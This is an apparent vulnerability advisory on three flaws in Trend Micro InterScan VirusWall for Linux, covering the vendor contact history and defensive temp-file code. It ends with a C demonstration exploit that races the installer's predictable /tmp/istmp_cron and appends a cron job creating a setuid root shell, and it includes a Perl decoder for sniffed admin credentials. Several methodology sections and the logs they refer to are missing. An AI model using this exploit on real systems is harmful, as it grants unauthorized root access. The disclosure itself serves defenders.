InterScan VirusWall - multiple vulnerabilities
SUMMARY
Product: Interscan VirusWall for UNIX
Vendor: Trend Micro
Testing Platform: RedHat Linux 6.2
vulnerable versions: 3.0.1 & 3.6.x
non-vulnerable versions: unknown
Issues: This advisory covers three separate issues
1) insecure password change mechanism - Password change
information is sent from the administrator's browser to the
setpasswd.cgi program in clear text.
2) weak authentication method allows password recovery - each
GET request contains the base64 encoded username:password pair
of the administrator. This can easily be converted to plain text.
3) predictable file names for root-owned temporary files -
Installation or removal of this InterScan VirusWall can allow
local users to become root.
Impact: Issues 1 & 2 could allow unauthorized individuals to learn
the password for the 'admin' account on this box. Using this
password, they could disable virus scanning, change the types
of files that are scanned, or alter the response the machine
makes to files containing viruses. Issue 3 could provide an
attacker with a privileged account they might use to attack
other machines within a network.
Fixes: On Dec. 29 a Trend Micro representative informed me that no
patches will be released, but the new version of ISVW (estimated
release late Feb. or early Mar.) will contain fixes for these
vulnerabilities.
Work-arounds: Only install ISVW on a stand-alone box. Don't use
the browser-based configuration tools remotely unless you
are confident that your network is not being sniffed.
Contact History: Trend Micro was contacted three times (once per
vulnerability) December 26-27. They've assigned these
three vulnerabilities to CASE ID# TDSC-237EA95D
Researcher: Joey Maier <[email protected]>
===================================================================
BACKGROUND
Trend Micro's InterScan VirusWall (a.k.a. 'ISVW') is a product that
is designed to provide "Real-time virus detection and clean-up for all
SMTP, HTTP, and FTP Internet traffic at the gateway"
(see http://www.antivirus.com/products/isvw/ for details on this product)
Trend Micro has versions of ISVW for NT, Solaris, HP-UX and Linux. This
advisory only covers the Linux version. It is unknown if the NT, Solaris
and HP-UX versions of this product display the same behavior.
===================================================================
*** DETAILS - insecure password change mechanism ***
Installation of the ISVW package on a RedHat linux 6.2 box places a web
server on port 1812. This web server runs a variety of CGIs that provide
web-based administration functionality. One of these is setpasswd.cgi,
which is used to change the administrative password for ISVW. As the
following snort log shows, the old and new passwords are sent in clear
text to setpasswd.cgi via a GET request.
*** METHODOLOGY - insecure password change mechanism ***
*** DETAILS - weak authentication method ***
ISVW's web-based administration uses CGIs that are passed information
via GET requests. Authorization to use specific CGIs relies on the
browser's usual low-security mechanism (HTTP Basic authentication).
This means that each GET request to the server contains the base64
encoded username and password. The base64 encoded 'username:password'
pair in the example snort log shown below is "YWRtaW46YWRtaW4".
It is trivial to sniff GET requests destined for the ISVW server and
use a base64 decoder to learn the password of the ISVW administrator.
The following script is sufficient for decoding captured
authentication tokens.
#!/usr/bin/perl
use strict;
use MIME::Base64 ();
# usage: decode.pl <base64 token copied from the Authorization header>
my $input  = $ARGV[0];
my $output = MIME::Base64::decode($input);
print "$input=$output\n";
*** METHODOLOGY - weak authentication method ***
To confirm this vulnerability, perform the following steps:
*** DETAILS - predictable file names ***
The install script for 3.6.x uses /tmp/crontab.$$ for this, which is
only slightly better. If an attacker can create /tmp/istmp_cron (or
/tmp/crontab.$$) before 'isinst' can, they will retain write access
to the files throughout the installation, allowing them to append their
own cron jobs to the file before crontab is called. Obviously, having
the ability to control the contents of root's crontab gives an attacker
the ability to become root.
*** METHODOLOGY - predictable file names ***
To confirm this vulnerability, perform the following steps:
[see the end of this advisory for a source code example using the
/tmp/istmp_cron file created by ISVW 3.0.1]
===================================================================
HISTORY
Vendor contact and disclosure timelines followed Rain Forest Puppy's
RFPolicy v2 (http://www.wiretrip.net/rfp/policy.html).
Issues 1 & 3 were noticed on December 22 and 21, respectively, but
Trend Micro was not notified until after Christmas so that they would
not ask anyone to work over the holiday. Issue #2 was noticed on
December 26.
Two notifications - the first for issue #1, the second for issue #2 - were
sent to the following Trend Micro addresses on December 26:
[email protected], [email protected],
[email protected], [email protected],
[email protected], [email protected],
[email protected], [email protected]
The third notification was sent on December 27.
Trend Micro's response was prompt and courteous. By the evening of
December 27, they had acknowledged receiving all three of my emails.
On December 29 they informed me that these problems would be fixed in
their new version.
COMMENTS
I'm surprised at how common the misuse of predictable /tmp files
still is. Vendors who are using /tmp should consider using alternate
portions of the directory tree that are not world writable. At the
very least, they should utilize mktemp. To be safe, they also ought
to check the ownership and permissions of the temporary file before
using it for critical things like crontab. If a vendor wants to
use a temporary file for a security critical purpose like modifying
cron, they should consider doing something like the following:
# start by creating a safe directory to use throughout the
# entire installation script. /root is not world writable, so
# nobody else can pre-create files inside it.
umask 077
mkdir /root/tmp || exit 1
[...]
# create a file with the current cron jobs (mktemp picks an
# unpredictable name and refuses to reuse an existing file)
TMPFILE=`mktemp /root/tmp/$(basename $0).XXXXXX` || exit 1
crontab -l > $TMPFILE
# append two new cron jobs to the file
echo "0 * * * * /etc/iscan/prescan.cgi >/dev/null 2>&1" >> $TMPFILE
echo "30 2 * * * /etc/iscan/cleanscan >/dev/null 2>&1" >> $TMPFILE
# check to make sure no one has messed with the file: it must still
# be a regular file owned by root (root's group is 'root' on Linux,
# 'wheel' on the BSDs). find is given the full path, since -name
# only matches the last path component.
file=`find $TMPFILE -type f -user root -group root`
[ -n "$file" ] || exit 1
crontab $file 2>/dev/null || exit 1
rm $TMPFILE
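The same ownership-and-permission check at the system-call level, as an added example that is not part of the original advisory (the function names and the staging directory are assumptions): the file is created with mkstemp() and verified with fstat() on the open descriptor, so the check and the later write refer to the same object rather than to a path a local user could replace in between.

```c
/* Added example (not from the advisory): create the crontab staging file
 * with mkstemp() and verify it through the open descriptor, not the path,
 * so a pre-created /tmp/istmp_cron-style file cannot be substituted. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* dir is assumed writable only by the installing user (e.g. /root/tmp);
 * path receives the generated name. Returns an fd, or -1 on any doubt. */
int open_safe_tmp(const char *dir, char *path, size_t pathlen)
{
    struct stat st;
    int fd;
    if (snprintf(path, pathlen, "%s/cron.XXXXXX", dir) >= (int)pathlen)
        return -1;
    /* mkstemp() opens with O_CREAT|O_EXCL and a random suffix: the name
     * cannot be guessed in advance and an existing file is never reused. */
    fd = mkstemp(path);
    if (fd < 0)
        return -1;
    /* Check what was actually opened. fstat() on the fd cannot be raced by
     * renaming or replacing the path after the open, unlike stat() or find. */
    if (fstat(fd, &st) < 0 ||
        !S_ISREG(st.st_mode) ||      /* not a FIFO, device or directory  */
        st.st_nlink != 1 ||          /* not hard-linked from elsewhere   */
        st.st_uid != geteuid() ||    /* owned by us, not by a local user */
        (st.st_mode & 0777) != 0600) /* nobody else can write to it      */
    {
        close(fd);
        unlink(path);
        return -1;
    }
    return fd;
}
/* Write the crontab entries through the verified descriptor; the caller
 * then runs "crontab <path>" and unlinks it. Returns 0 on success. */
int stage_crontab(const char *dir, const char *entries, char *path, size_t pathlen)
{
    int fd = open_safe_tmp(dir, path, pathlen);
    size_t len = strlen(entries);
    if (fd < 0 || write(fd, entries, len) != (ssize_t)len) {
        if (fd >= 0) { close(fd); unlink(path); }
        return -1;
    }
    return close(fd);
}
```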
I'm disappointed with Trend Micro's decision to release an updated
version of ISVW without releasing patches for the current versions.
Unless they heavily advertise changes made for the sake of security,
many customers will be unaware of these issues and may remain
vulnerable. If a vendor chooses to stop releasing patches for a
product, they should inform their customers that they are no longer
supporting that product.
ACKNOWLEDGEMENTS
Thanks to the following individuals for providing feedback on this
advisory: Chris Horton, Dan Kaminsky, Kevin Hart, Walter Maier,
Irwin Dulan
Thanks to Jeff McElroy of http://www.Radux.com for the demonstration
program used to illustrate issue #3 to the vendor.
Thanks to the people and teams responsible for the following tools used
in this research:
OpenBSD: Theo de Raadt and many others (http://www.OpenBSD.org)
Perl's MIME::Base64 Module: Gisle Aas (http://gisle.aas.no/perl/)
(also at http://www.perl.com/CPAN-local/modules/by-module/MIME/)
RFPolicyV2: Rain Forest Puppy (http://www.wiretrip.net/rfp/policy.html)
Snort: Martin Roesch and many others (http://www.snort.org)
Watch-Temp: mudge (http://www.atstake.com/research/tools/l0pht-watch.tar.gz)
"Do not follow in the footsteps of wise men.
Instead, seek what they sought." -- Basho
===================================================================
*** DEMONSTRATION PROGRAM - predictable file names ***
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
/* the predictable temporary file used by the ISVW 3.0.1 installer */
#define TMPFILE "/tmp/istmp_cron"
#define CRONTAB_ENTRY "* * * * * cp /bin/sh /tmp/rootshell; chmod 4755 /tmp/rootshell\n"
int main(int argc, char *argv[])
{
    int file;
    off_t file_size;
    struct stat file_stat;
    int rc;
    /* create the temporary file before 'isinst' does, so this process
       keeps write access to it throughout the installation */
    file = open(TMPFILE, O_RDWR|O_CREAT|O_APPEND, 0777);
    if (file < 0) {
        perror(TMPFILE);
        return 1;
    }
    /* wait until the installer writes the current crontab into the file */
    rc = fstat(file, &file_stat);
    file_size = file_stat.st_size;
    while (1) {
        rc = fstat(file, &file_stat);
        if (file_stat.st_size != file_size) {
            /* append our cronjob before the installer hands the file to crontab */
            rc = write(file, CRONTAB_ENTRY, sizeof(CRONTAB_ENTRY) - 1);
            close(file);
            return 0;
        }
    }
}